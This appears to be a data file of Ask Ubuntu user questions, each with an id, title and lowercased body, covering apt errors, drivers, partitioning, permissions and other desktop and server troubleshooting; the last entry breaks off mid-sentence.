108856	error while updating via terminal	( translation ) having problems when i update the system via the terminal : sudo apt-get update w : gpg error : http : //ppa.launchpad.net natty release : the following signatures could not be verified because the public key is not available : no_pubkey 5a9a06aef9cb8db0 ( / var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ natty / i386 partner packages ( / var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-i386_packages ) i 'm maybe too many repositories ? ( original post ) habe nen problem beim update des systems via terminal : sudo apt-get update kommt leider folgende fehlermeldung : w : gpg-fehler : http : //ppa.launchpad.net oneiric release : die folgenden signaturen konnten nicht überprüft werden , weil ihr öffentlicher schlüssel nicht verfügbar ist : no_pubkey 5a9a06aef9cb8db0 ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ oneiric/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-i386_packages ) habe ich evtl zu viele repositorys ? kann mir jemand weiterhelfen ? ! beste grüße
108859	upstart script variables that wait for system services to be available	i 'm writing an upstart script that has to issue several utilities to manipulate files , ls , rm , etc . some of these commands are not being executed . if i put a timer and make the script wait , they work . is there a upstart variable that i can use to ensures command line utilities are fully loaded and available when my script executes ?
108862	import media does n't set the artist and album for all my tracks	i 've recently moved the house pc from windows 7 to ubuntu . i have 1000+ albums on a lacie drive . these are catalogued : artist/album ( s ) /tracks - so one artist may have many albums . when importing , some paths display the artist album properly in banshee , but most end up as unknown artist , unknown album . so i end with a few albums properly displayed then everything else as unknown , which is n't useful . i can not see what the difference is between the successful paths and the failures . it is odd - i created a test path on home as fred/album1/xx.mp3 and imported it but it came in as unknown . i am setting the import preferences to : album artist/artist anyone else seeing this ? further info : /media/lacie/records/tom waits/rain dogs/singapore.mp3 worked ok but : /media/lacie/records/tom waits/glitter and doom live disc 1/06 such a scream.wav did not . ( it 's not the wav subscript , because they work sometimes ! )
108863	username is number ?	i can not work this out . if i 'm logged in as root ( using chroot - possibly ) then all my actions ( e.g . mkdir ) are assigned to the user root . for my websites i need to associate files and directories and such to a specific user which appears to be linked to the virtual host account for the hosting account . ( its a dedicated hosting server - we log into the control panel and click `` create account '' . this creates a new dir in /home with a www/public_html dir in it ) . for instance here is a screenshot of the www folder for one account : i do n't understand what its all about . the user appears to be 2045 however this is a number . typing id 2045 into the command line results in id : 2045 : no such user so does id `` 2045 '' . you can chown 2045 : sites though , so i 'm not entirely sure what 's going on . is 2045 a user ? or something else i do n't know about ? what i really want to do is be able to switch user ( su ) to 2045 and run the commands so that i do n't have to chown every time i do something ( i work with svn a lot ) . any insight would be very helpful . : ) thank you .
108871	how to download a folder on ubuntu one ? mac	hello i 've found here a thread talking about wget . i have looked for installing wget in mac . then , i tried to download the files using this command : wget -nv -- content-disposition ( https : //one.ubuntu.com/files/ # f=f % 2funtitled % 2520folder ) it did n't work . ( it downloaded some undetermined file of 1700 bytes . ) i then found this : http : //lifehacker.com/161202/geek-to-live -- mastering-wget and tried wget -r -l1 -h -t1 -nd -n -np -a.mp3 -erobots=off -i lessonmp3.txt this is the link to the lessonmp3.txt . i then tried wget -a.mp3 -a.pdf ( https : //one.ubuntu.com/files/ # f=f % 2funtitled % 2520folder ) it downloads the same 1700 byte file but deletes it afterwards . i am quite computer illiterate . please help !
108879	ubuntu on hp compaq nx 6120	how do i install ubuntu on an hp compaq nx 6120 ? what drivers do i need ( audio , vga , touchpad , wireless lan ) ? can i use autocad 2009 on ubuntu 11.10 ?
108880	install ubuntu server to run on a headless machine on raid6-array of usb-sticks , in dhcp-less environment	i happen to have a box without hdd ( or cd for that matter ) , but with four ( now clean ) usb sticks , no display , on wired lan without dhcp server ( i.e . static network configuration ) . i want to install latest ubuntu server on this box . is there an installation guide that would cover all of the above points ? alternatively , please point to guides that i can mash together to figure out what i need : - )
108887	how to disable processor drivers	i have a toshiba laptop that freezes when i plug in the ac power cord . but i remedy this in windows 7 by going into safe mode then control panel > device manager > processors and disable both of them . what i am disabling is the processor driver actually thus preventing the processor from going into c or p states . the problem is , whenever the processor goes in power management or downclocks , the system freezes and shows colorful horizontal or vertical lines . i wanted to try out ubuntu 11.10 and i do n't know how to do this in this new os . p.s . i 've just installed ubuntu 11.10 and i have no idea on it . i want to move to this new os and be done with windows . can anyone help me on this ?
108888	yum whatprovides 'perl ( foo : :bar ) ' equivalent with apt or dpkg ?	this is certainly related to this question , but i feel it does n't overlap , so here we go . how can i get the functionality of the following command on ubuntu ( and/or debian as bonus ) : yum whatprovides 'perl ( foo : :bar ) ' obviously i can attempt to rely on the package somehow ending up in a folder structure that resembles the namespaces in perl , but i 'm looking for something equivalent , i.e . equally brief and trivial . however , if it does n't work as briefly on ubuntu , i can do with a longer path and create my own function . please consider 10.04 or newer for this question .
108892	ubuntu 11.10 could not start just after installation	i just installed ubuntu 11.10 on quite old machine ( amd sempron 2200+ ) . after rebooting i see only followed information : * checking battery state ... [ ok ] fsck z pakietu util-linux 2.19.1 /dev/sda1 : clean , 141591/2403744 files , 940774/9606656 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox * starting apparmor profiles [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher checking for running unattended-upgrade : * starting bluetooth * pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned and nothing more . ctr+alt+delete cause normal restarting ( stoping processes and so on ) . what is going on ? how could i fix it ?
108905	install faenza icons on libreoffice 3.5 toolbar	according to a web upd8 post from july 2011 , it is possible to install faenza-styled icons on libreoffice toolbar . i ca n't install faenza the traditional way on lo 3.5 ( i.e. , changing the toolbar icons from crystal or tango from inside the application 's `` options '' menu ) and now those icons are broken . faenza was already installed but the update removed everything .
108907	accessing a folder that i ca n't `` name '' in the shell	i have a stubborn folder that someone must have created accidentally and that has persisted all this time . i can see it with : # find /var/www/html -maxdepth 1 -type d which gives me : /var/www/html /var/www/html/files /var/www/html/. ? unfortunately the question mark there is not the actual character ? , it merely seems to denote that there is no proper glyph and/or translation for that character . so something like rmdir is out of the question . my system has utf-8 as the default locale as so many modern ubuntu systems , but admittedly the folder in question may have originated on a rhel or centos box ( tared up and unpacked ) . # env|grep lang lang=en_us.utf-8 when trying to cd .\ ? ( as mentioned before it is not actually ? ) i get auto-corrected to . by bash and actually end up in /var/www/html/ . for some reason . now if i ca n't `` name '' this folder usefully , i can not access it in any way . how can i get rid of it without putting the whole system in jeopardy ? now i installed detox already but that only seems to act on files , not folders , according to its documentation and besides it still requires that i be able to name the object somehow to do something with it .
108909	how to install proprietary driver	where do proprietary drivers go in 10.04 lts ? it says there are no proprietary drivers available . the driver i want to install came in a folder named hybrid-portsrc_x86_32 followed by -v5_100_82_112 . ( the contents of this folder are folders named lib and src and a file named makefile . ) where should it go in my ubuntu folders , so it shows up on the hardware drivers list ?
108910	can i usably run photoshop in a windows vm with this setup ?	i 'm researching hardware in order to build a new pc and i 'd like to run linux as my main os and just run windows in a vm . do you think it 'll be fast enough to run photoshop in a windows vm or will i still have to dual boot ? are the graphics supported by ubuntu ( both the radeon card and the integrated chipset ) ? my current plan is here as an amazon wish list . in summary : cpu - intel i5 2500k mobo - gigabyte z68xp-ud3 memory - corsair 16gb ( 4x4gb ) 1600mhz graphics - asus 1gb radeon hd 6850 pci-e 2 srt - nocti msata 60gb ssd ( just for the caching , i have another drive for main hdd ) cheers , matt
108924	missing /dev/xconsole causes rsyslog to stop as well as all other services	we are running ubuntu-10.04.04lts in hyper-v environments . we found that the services ssh http or anything else stopped because the rsyslog daemon had died with the message unable to find the /dev/xconsole file . i fixed it temporarily with the following . file=/dev/xconsole if [ -e $ file ] ; then echo `` $ file exists carry on ! '' else mknod -m 640 /dev/xconsole c 1 3 chown syslog : adm /dev/xconsole echo `` created $ file . '' fi the problem is that i can not get rsyslog daemon to process these 8 lines when i restart the daemon . also restarting the daemon removes the /dev/xconsole file and we are back to all service stopped . in addressing this problem i have inserted the if -- fi lines after the start and restart conditions in the rsyslog script . the problem is i do not get an echo to stdio . does someone have an idea on how to make the rsyslog report to stdio when it creates the /dev/xconsole device . thanks george van tuyl
108925	how to tell chrome what to do with a magnet link ?	right now chrome throws its apron over its head and calls firefox , which opens the link with rtorrent . what do i need to do to eliminate the firefox step ?
108927	can not run update due to a dpkg error with burg-theme-minimal-sir	i can not run an update or indeed run $ : apt-get remove due to a dpkg error with a package that 's a part of super-boot-manager . running an update returns : dpkg : error processing burg-theme-minimal-sir ( -- configure ) : subprocess installed post-installation script returned error exit status 1 i tried removing this package alone , with the same error , also trying to remove super-boot-manager returns : ( reading database ... 225474 files and directories currently installed . ) removing burg-theme-minimal-sir ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error processing burg-theme-minimal-sir ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing super-boot-manager ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : burg-theme-minimal-sir e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm sort of stuck now and google has failed me . has anyone encountered this problem before ? or does anyone know a way for fixing this ?
108929	easiest way to upgrade php to latest version ?	i 'm seeing info on how to upgrade from a specific version to another , and that is what i want to do ( currently 3.3.6 ) , but is there a simple command to do this ? i 'm a complete ubuntu/linux noob so i have no idea what i 'm talking about , i just want to upgrade php because my current version maybe limiting the amount of input elements that i can post to the following page .
108935	how can i stop getting disconnected from my enterprise wpa2 wifi network every ~ minutes ?	when i 'm connected to my school 's wifi network , which is an enterprise wpa2 network , using peap authentication and mschapv2 , i get disconnected every 30 minutes to an hour . it wo n't reconnect , and the only way i can get it to reconnect to the network is to flip my hardware wifi kill switch ( on my laptop , which is an msi x350 here 's what i assume is the relevant output of lspci : 03:00.0 network controller : intel corporation wifi link 5100 and here 's ( probably too much , but i do n't know what 's relevant ) stuff from my system log : http : //pastebin.com/apurdbrx i 'm using kubuntu 11.10 with the kde4.8 backports . but i 've been having this problem with this machine since i bought it and was using ubuntu ( unity ) 11.04 . the problem persists no matter whether i use the gnome network manager or kde 's . edit : i 'm now using gnome again , but having the same problems .
108936	how to delete history of installed packages	i need to delete the synaptic/software center history ( commit logs ) . how can i go about doing this ?
108937	lenovo ideapad s10e no audio ubuntu 11.10 installed	after installing via usb thumbdrive , ubuntu 11.10 installed with near perfection . the only thing that does n't work is the audio . after running aplay -l i get no sound card as a response . can anyone help ?
108946	how to unzip files into the current directory ?	i am trying to write a bash script that will automatically unzip mp3 downloads and move them into my ~/music folder . my problem is that when i use the unzip command , it creates it 's own folder within the downloads folder , when i would rather it to just list all the mp3 files in the ~/downloads folder . my question is if there is a way to have the files listed in the ~/downloads folder instead of creating its own folder within the downloads directory , or if there is a way to automatically change directories to the resulting unzipped folder assuming i do n't know the name of that folder ? sorry if that sounds confusing , but thanks for any help !
108948	how to log file names a process accesses	i need to monitor a process to find out what file it is saving it 's configuration data in . i ca n't find the config file , but i know the process . is there a way to log the files that a process is accessing ( including spawned processes also ) ?
108954	how to see specific information from the motherboard	i know that for example : lshw - shows all the info for all hardware . lsusb - shows all connected usb devices . lspci - shows all pci connected devices including agp , pciex and any other related . cat /proc/meminfo - shows information about the memory . cat /proc/cpuinfo - show information about the cpu . hdparm -ii /dev/sda - shows information about the hdd . but what about the motherboard . lshw is too generic . is there a specific command for the motherboard . to show what the motherboard is capable of , name , version , slots , etc.. information specific to the motherboard .
108955	enable/disable passwordless login/autologin via gui/command line	before i ask the question , would someone please help stipulate the ubuntu definition for these two seemingly identical but different terms ( i 've given drafts . ) : autologin - when you power up the computer , you sign directly into your account . passwordless login - when you pick a user at the greeter and you are logged in without a prompt for a password . now , for the question . how do we change each via the command line ? is the solution the same for all currently supported releases ? and for those who would rather use the gui method , how is that done ? at the bottom of this pic is the checkbox for a passwordless login . it says : do n't ask for password on login how do i do this with the command line ?
108966	how do i fix dragging items between two monitors ?	i have two monitors set up using nvidia twinview on ubuntu 11.10 . when i drag something ( a file , a link on a website , select text , etc . ) , my right-hand monitor screws up . usually the screen shifts up by about 200 pixels , and i often get weird graphics glitches . i made a video here which is kind of grainy , but shows what happens . the video does n't exactly show what i see because during the first 12 seconds , when dragging from the left monitor , the right monitor screws up like in the last 12 seconds . this does n't happen when dragging windows , only objects like files or hyperlinks . sometimes my desktop gets stuck like that , which is really frustrating . my graphics card is an nvidia gtx 460 se . i 've had this problem for some time , but i definitely know there was a time when i had two monitors and this did n't happen . glxinfo xorg.0.log dmesg xorg.conf > lspci -nn | grep vga > 03:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0e23 ] ( rev a1 ) i 'll also include a screenshot which basically shows what 's in the video . based on fossfreedom 's advice , i tried installing the 295 drivers from the ubuntu-x-swat ppa . i follow the instructions here which did n't install them . i made sure i was booting into kernel 3.0.0-16 ( before i was using 3.0.0-12 ) and reinstalled again to no avail . the reinstall command says it 's installing the 295 drivers , but they 're not getting installed for some reason .
108967	how to zoom in and out of text in gedit ?	i am using ubuntu 11.10 . this seems to be an easy question , yet i can not find an answer anywhere . on pre-unity ubuntu , i was using gedit-zoom plugin to zoom text in editor window in/out , either with ctrl++/- , or by holding ctrl+ scrolling mouse-wheel . the same plugin does not seem to work in ubuntu 11.10 . any way i can get text zooming capability ?
108969	where does wallch save the list of pictures and folders it takes pictures from ?	i want to write a bash script which can remove the current wallpaper from the wallch playlist . by playlist , i speak of that list in wallch to which you can add pictures and folders , telling wallch that it can use these as wallpaper . how is this playlist stored by wallch ? sqlite ? xml ? can i access and modify this playlist programmatically ?
108970	am i being hacked ?	i recently let a hacker ( who i met once and do n't know too well ) connect to my computer through ( i guess it was remote access ) - i had to fill in my ip on a third party website and click a button and he had full access to my desktop and used my command terminal in ubuntu 11.04 to do a series of installations ( that i needed help with ) and then disconnected . shortly after , i started experiencing random things- solitaire games randomly being opened when i return after leaving it unattended and some other odd things . the icing on the cake was this : when i typed the 'who ' command in the terminal , here 's what i got : *'myusername ' tty7 2007-04-26 00:14 ( :0 ) *'myusername ' pts/0 2011-11-11 21:45 ( :0 ) so my concern is that i did n't even own this laptop at that date , yet alone have ubuntu dual booted on my system . think i 'm being hacked ? or is that just the date of the origin of natty desktop environment ? who knows . i might be paranoid .
108971	can you move the notification popups ? if so , how ?	i am trying to find out how to move the notification area down on my monitor ( i 've got dual monitors ) ; i would prefer to move them to bottom left of right monitor if possible , if not center right of the monitor will do . is there a tutorial or some software that allows me to do this ?
108972	install catalyst 12.1 driver makes system slower	i 'm using a toshiba satellite t135d with gpu radeon mobility hd 3200 i 've installed latest driver catalyst from amd and why the graphics performance of my laptop become slower than previous ? my step download and install the driver sudo aticonfig -- inital -f turn off vscync and change the refresh rate in ccsm , but the performance still laggy t_t
108974	managing cron . *	i see that ubuntu uses /etc/cron . { daily , weekly , monthly } for cron jobs . i also see that some things , like updatedb from mlocate , put their jobs there : $ dpkg -l mlocate|grep y/m /etc/cron.daily/mlocate somtetimes , i would like to disable some of these jobs ( mlocate in this case ) . i can obviously sudo mv /etc/cron.daily/mlocate ~/cron.daily-dont-run and be over with it . however , two questions : is this how this gets managed ? is there something like service to manage sysv init scripts or overrides such as described in upstart intro , 10.41.1 override files ? i would like to tell it `` ok , i do n't want you to start '' , but without touching what is installed ( see next item for one of the reasons ) if i delete and then reinstall mlocate , i 'll again get the cron.daily entry . also , i guess ( is this true ? ) upgrades will probably not go smoothly ( e.g . it will make a cron.daily entry or maybe possibly break the package if there 's something in the cron entry that it depends on ) . if you do , how do you manage / deal with the things such as the above ?
108979	automate password set and verify	i 'm using this to set passwords in a script : usermod -p `mkpasswd -h md5 passwordtext` user i need to create an exception in my script , just in case this command fails . what file contains the encrypted password and how do i reverse the encryption so i can verify it was written to the file correctly ? edit : i finally found the problem with the line above . the password was allowing symbols that were being interpreted as wildcards on the command line making it appear as if the command itself failed . nonetheless , it 's lead me to new things i 'm glad i know now .
108980	how do i install cackey ?	i am trying to install the cackey to have my cac be recognized by firefox . i am used to windows guy , right click and install . anyone has detailed instructions on how to create the lib64 folder , and how or what extension i need to save . tnhx ...
108986	help with tool recommendation , to build a parse tree for c source code	i need a tool that can generate a tree for a c application . like walking through it to build which methods is called
108989	adobe flash not working in firefox	i am getting following image everytime i try playing videos on youtube or fb . i have already tried uninstalling flashlugin and then installing again . but , it didnt help . i also tried installing it via synaptics , but even that didnt help .
108990	will ubuntu for android also run when the phone is not docked ?	does anybody know if ubuntu for android will , most critically , run also when the phone is not docked ? any references will be appreciated . thanks in advance .
108992	ubuntu not booting after installing on windows with wubi	i am running a hp pavilion dv6 notebook with an amd a8 quad core processor and a 64 bit operating system . after installing ubuntu with wubi on my computer , it told me to reboot it , so when i did the boot manager appeared and i chose ubuntu . when i did that my sreen turned the color of the ubuntu backgroud for a second or two and then went totally black . it stayed that way for over an hour and then i decided to manually shutdown my pc . i tryed running ubuntu serveral more times but still had not luck . any suggestions ?
109000	nicer ftp client than filezilla ?	filezilla is really kind of `` meh , '' when it comes to user interface . i 'm wondering if there 's something simpler/cleaner/slicker out there ?
109002	ca n't make a boot disk	... for the newest version of ubuntu . am using a macbook , have tried both usb and cd instructions down to a t with no luck . on my mac , with both the cd and usb i get the error 'failed to read media ' or something to that effect . i 've gone through about 20 discs and it 's driving me insane . on my computer with no os , if i try to boot with the usb i get the error 'isolinux.bin is missing or corrupt' so ... er , possibilities of what is going wrong ? i 'd prefer the usb because it 's reusable and because my optical drive for my new computer has been lost in the post ( but that 's a completely different grizzle altogether ) . i have also sifted through youtube and google and tried just about every slight little variation on the instructions and none of that has worked either .
109005	how to install smoothtasks in kubuntu ? ? / general tarball install help	ive been using mint , and more recently ubuntu for over a year now . ive learned a lot , and know my way around most things . however , ive yet to learn to compile and install things . this wouldnt be much of a problem if the guides for just about everything in .tar.gz form always went through . i cant for the life of me find a good guide on how to compile and install things in a tarball , and id appreciate a good , easy , explanatory guide that will finally solve this for me . also , ive been trying to install smoothtasks ( or at least i believe its called ) - its a windows 7-like taskbar for kde . i cant figure how to install it , and would appreciate the help . i know its an easy question , but it would help me very very much to finally understand tarball installation , and how to finally pull one through . thanks .
109015	does installing apache overwrite all ( including mounts ) www folders ?	i have a old hard drive ( with ubuntu 32b ) that was running my website . the site was located in /var/www/vhosts/debug.onlinelabtests.com i removed the hard drive , and dropped in a new one . install ubuntu 64b . mounted my old drive in /mnt/external . i then made sure all my files were there /mnt/external/var/www/vhosts . i then went on to install apache , mysql and php . after i installed vsftpd . then i went to download my old files and begin to migrate into the new server , and they were gone ! are my files gone for good ? ! currently my /var/www is empty . any help , greatly appreciated !
109017	restore bottom panel/gnome classic	i 'm running ubuntu 11.10 and deleted my `` bottom panel '' so i could run glx-dock . i ended up not liking it and wanted to restore the `` bottom panel '' like it was before.i have searched the different options on here but nothing makes it go back to how it was . also i have added a `` bottom panel '' from right clicking on the top one , but when i minimize a window thats open , it hides in the corner somewhere.is there a full proof way of returning it too normal ? thanks
109019	what happened to the new icon theme for 12.04 ?	in the last ubuntu developer summit ( uds ) , the developers from the desktop team and mark shuttleworth announced that a new icon theme is coming for ubuntu 12.04 , but ... the beta 1 is out and still no news of a new icon theme . has this being postponed to ubuntu 12.10 or later ?
109023	how to lock firefox version ?	i would like to lock firefox version in ubuntu 10.10 as we are running our software in firefox version 3.6 . coz of this we are unable to upgrade the latest packages and updates if i do that firefox version is also getting updated to version 10 . i just want to lock the firefox version so that it wont be updated . is it possible ?
109026	set audacious to open maximized ?	i 'm using audacious 3.2.1 , on gnome-shell . however , everytime i open it , it starts not-maximized . is there a way , like editing the command for the launcher in the menu editor , to make audacious fire up maximized ? i 'm not interested on the `` maximus '' utility . any ideas ?
109033	why wont my pipeline work ?	i am trying to make a bash script that will find all the mp3s in my downloads folder and move them into a music folder . why wo n't this line work ? find ./ -type f -name \*.mp3 | mv *.mp3 /home/mitch/desktop/music/ $ artist i tried using a pipeline to have the information from the first command translate to the second , but i have never used a pipeline before and do n't know if i 'm doing it wrong or if i have the wrong idea of what they are used for .
109038	vsftpd proper permission for root user	i did set up vsftpd on my server and can successfully login using a user that has root permission on the server . however , i can not create any directories outside of the user 's home directory . any idea why that is ? i have the option write_enable=yes enabled . thanks for any help !
109040	install ossec hids in ubuntu generate error	i work with ossec hids in ubuntu 11.10 : http : //www.ossec.net/wiki/know_how : databaseoutput when install with mysql support , it back me this error /tmp/ccus4fyw.o : in function mysql_osdb_connect ' : /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:164 : undefined reference tomysql_init' /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:178 : undefined reference to 'mysql_options' /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:183 : undefined reference to 'mysql_options' /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:186 : undefined reference to 'mysql_real_connect' /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:189 : undefined reference to 'mysql_error' /home/bkhezry/downloads/ossec-hids-2.6/src/os_dbd/db_op.c:190 : undefined reference to 'mysql_close' /tmp/ccus4fyw.o : in function `mysql_osdb_close ' : ... i 'm sure that mysql in install , test it with sample c++ code and back me data record . i know problem is in /src/config.os that generat with : make setdb cdb not point to the lib of mysql that need to install ossec hids . but i do n't know how to fix it . i want install all pack of mysql lib . help me . thanks anyone can help me . thanks alot .
109042	how would one know a charms dependencies ?	if really really novice user is using juju and wants to deploy wordpress how would he come to understand that mysql is required to deploy it . if you take another product xyz which is n't as popular as wordpress and has no deployment related articles available through google , then in this case the user has to go through a chain of activities on the terminal to finally understand and deploy the xyz product . the user has to do something like this on the terminal : charm get xyz or wget xyz from somewhere cd xyz cat config.yaml read the `` requires '' interface goto http : //charms.kapilt.com/interfaces find the charm that provides the interface , say charm `` abc '' charm get abc execute juju deploy , etc you see what i mean ... unless there is another way that i 'm not aware of . how would one know a charms dependencies ?
109044	remote desktop only works locally	here 's my problem , i want to be able to remote control my grandparents computer in order to help them without having to drive 20 minutes to get there . however i can only connect to their machine when i 'm on the same network . i 'm using the default vnc server vino with vinagre client.what settings do i have to use to make it work ? ( their os 10.04.4 , mine is 11.10 )
109045	vpn ( pptp ) service failed to start	when i try to connect to a vpn pptp connection from network manager it fails with this message : vpn connection failed because the vpn service failed to start . it worked without any problem till i installed kvpnc application . i think that this app is the reason .
109050	gnome shell `` aero snap '' not working anymore	i am using gnome-shell on oneiric from the official repos together with ppa : gnome3-team/gnome3 . since a few days , the snap function has suddenly stopped working . dragging a window to the left , right or top wo n't do anything . has anyone experienced something similar and knows a way how to reenable this feature ? thanks in advance .
109056	install - partitioning problem ( 'unusable space ' )	how can i create another partition ( to e.g . parallel install a different ubuntu version ) with this current partitioning table ? after shrinking /dev/sda4 there is only this 'unusable ' space ? ! my current partitions are as per gparted : /dev/sda /dev/sda1 ntfs ( windows ) /dev/sda2 ntfs ( windows ) /dev/sda5 ext4 ( linux /home ) /dev/sda7 ntfs ( joint data partition ) /dev/sda6 swap /dev/sda4 ext4 50028 mb ( oneiric ) unusable 67000 mb any advice ?
109059	force unity dash application to launch with a custom option	i would like to make a program in the unity dash to launch with a custom option , as for example in the terminal it would be xyz -- reconfig is this possible ?
109062	messed up partition table , not recognizible	i managed to mess up the partition table of my main media hdd . gparted can not recognize it anymore . there 's everything i ever had since my first pc . i ran `` attempt data recovery '' in gparted ( it required gpart so i installed it ) , and now it 's showing `` searching for file systems on *my_hdd* '' . can anyone tell me if i did it right , or should i stop this process and use some of the solutions posted all around here ? i activated `` attempt data recovery '' on instict , and then googled out everythihg else . i also know that nothing has been written to my hdd , i messed it up trying to remove mbr from it , and deleted first 512bytes using `` dd '' . anything you can say about this is helpful , as this computer is family shared . thanks in advance . i already ran testdisk and it 's processing the hdd already , much faster then gparted . it 's on 15 % already . i can not find a hard drive to backup my existing one , but i 'm hoping by reviews i 've seen for testdisk that it will help without backing up my data ... yes , the only thing i 've done was erasing the first 512 bytes trying to erase mbr because i moved my os 's to a new smaller drive , and expanded the media partition of my old drive to fully utilise it 's 500gb capacity only for media . but gparted screwed me along the way ... i believe that testdisk will help , i 'll just give it time and post the results here . thank you ! i managed to fix it by just restoring the mbr using testdisk . for anyone that may have such problems in the future , there actually is an option to restore mbr from the mbr backup . after that , i just set the partition type from boot to primary , and all of my data is here , untouched . also , my primary disk that ubuntu could n't access , well the problem was some raid metadata , that i erased . there are guides on the web on how to do this . after a reboot , my system works like nothing ever happenned .
109070	how can i unlock a password locked rar file without knowing the password ?	i have .rar file that is password protected , but i accidentally have forgotten the password . the file extremely important to me . how can i get my file back ? in windows , there was many programs that could remove the password of such a file . is there one for ubuntu ?
109072	upgrade awstats 6.9 to 7.0 on ubuntu 10.04 lts	i want to take advantage of the new features in the latest version of awstats on 10.04 but dont want to upgrade the os as other software i am using requires that specific os version . is there any way to upgrade ? already tried using aptitude and 6.9 is the latest version . thanks .
109073	why is there a problem in firefox connecting to a particular site securely ?	i installed ubuntu 11.10 very recently , not incredibly it literate , finding my way around . ca n't connect from firefox to my.virginmedia.com . i 'm warned against continuing because someone may be trying to impersonate the site any suggestions ?
109075	ca n't see windows partition in wubi install	i installed ubuntu as dual boot using wubi . all seems fine , only i ca n't see the files on my hard drive . do i need to do anything special to mount it , or similar ? in the nautilus file browser ( top left under the dash home button ) i see on the left hand side devices ( with system_drv and a recovery partition shown ) , computer ( with home , desktop ... etc ) and network . everything in computer seems empty , except file system , which shows content specific to ubuntu . ca n't see anything on the windows network either ... looking forward to learning . ps i have windows 7 ultimate x64 installed .
109078	how can i enable multitouch features on my desktop touch screen	i have a `` medion '' touchscreen ( bought from aldi ) . the display works perfectly , as do single touch inputs . however , despite the screen being multitouch capable , i ca n't get multitouch gestures to work . i 've tried installing the `` evtouch '' package from the repository , but this has not solved the problem . i 'd like to get this to the point where i can understand the problem well enough to file a bug : ) many thanks in advance for your help .
109094	why were gimp removed at the last upgrade ? and can i get it back ?	well , i did a partial upgrade and it included removing gimp . i said myselfs : '' ah , i 'll reinstall it later '' . but i ca n't ! ! ! ! when i try to install it , thats wot i got : the following packages have unmet dependencies : gimp : depends : libgimp2.0 ( > = 2.7.5 ) but it is not going to be installed depends : libgimp2.0 ( < = 2.7.5-z ) but it is not going to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.30.0-0ubuntu4 is to be installed e : unable to correct problems , you have held broken packages . i want my gimp back ! help pls !
109095	how can i change the password of deja-dup ( backup ) ?	how can i change the encrypted password of deja-dup ( backup ) ? i have set the encrypted password , it worked in the first two days , but now every time the backup starts it asks for the password i type it but it asks again and again as a result the backup is not taken . i 'm using ubuntu 11.10 . thanks for your help !
109098	computer freezes after i select `` install on hard disk ''	my desktop has below configuration ... .when i try to install the ubuntu 11.10 on my computer . all goes well till booting but when i select `` install on hard disk '' it process and after a very few mintues it freezes and only cursor blinks on the screen . intel pentium 4 cpu 3.06 ghz ram 1 gb system 32 bit ati radeon display card motherboard intel d102ggc2 could anyone tell me what is that problem and how can i install the ubuntu on my desktop .
109103	how do i install a dvd decryption library ?	i recently built a computer running ubuntu 11.10 . it works great , except for one thing . with some video dvds , when i insert them into my drive , the movie player just says `` an error occurred . could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . '' my mac plays the dvd just fine . what is a dvd decryption library , and how can i install it ? thanks ! edit : i need legal way to do this . all i want is to be able to use this computer as a htpc !
109114	bittorrent is very slow	i 'm using ubuntu 11.10 and bittorrent download speed is very slow . i tried many torrent clients , opened ports but nothing works . i do n't know what information you 'll need for this problem so tell me what to do and i 'll post them .
109120	how do i turn off the screen saver using the command line ?	i would like to turn off the screen saver from command line , which used to work with gconftool-2 -s /apps/gnome-screensaver/idle_activation_enabled -- type=bool false in natty & oneiric for precise this does not work . any ideas ? i know where i can do that in the gui , i 'd need the setting for an automatic installation script , that also changes some default settings .
109121	did i lose my personal files ? ? help !	my u11.10 was not booting up . i tried to `` repair '' by reinstalling using live cd , option `` upgrade from 11.10 to 11.10 '' ( none of your personal files will be touched ) . when the installation was almost over , it got stuck on the keyboard layout , it says that all files were copied , and it was waiting for me . systeme will not respond so i force shut down . when it cameback , it only had a guess account but i ca n't find my files . where would they be ? ? ? how can i recover them ? please , i need just to get those files . this was my file server . thank you !
109134	i deleted disk partitions - installing ubuntu 11.04 to win7 build - i need windows back but how ?	steps to disaster installed ubuntu 11.04 partitioned drive upon install and gave ubuntu entire disk . several months later i need win7 as dual boot what happens at present booting into win7 via f9 option at boot .. takes me to ubuntu . it describes 'preparing to boot from windows ' but screen goes purple and it comes up with ubuntu instead . booting normally : machine either makes a horrible beeping ( continious ) and blank screen or boots in ubuntu or a mix of beeping initially then fires up ubuntu . ( to be honest best to f9 to get into ubuntu .. seems the cleaner option ) using a script i have obtained the following disk information : grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . windows is installed in the mbr of /dev/sdb.sda1 : ( obviously no partition exists on the drive - that 's my understanding and my knowledge of unix/linux/ubuntu is limited ) nb.there is a ref to sda1 at the bottom of this script for grub ( grub2 is installed ) which is sda1/boot/grub/grub.cfg : file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda2 : file system : extended partition boot sector type : - boot sector info : sda5 : file system : swap boot sector type : - boot sector info : sdb1 : 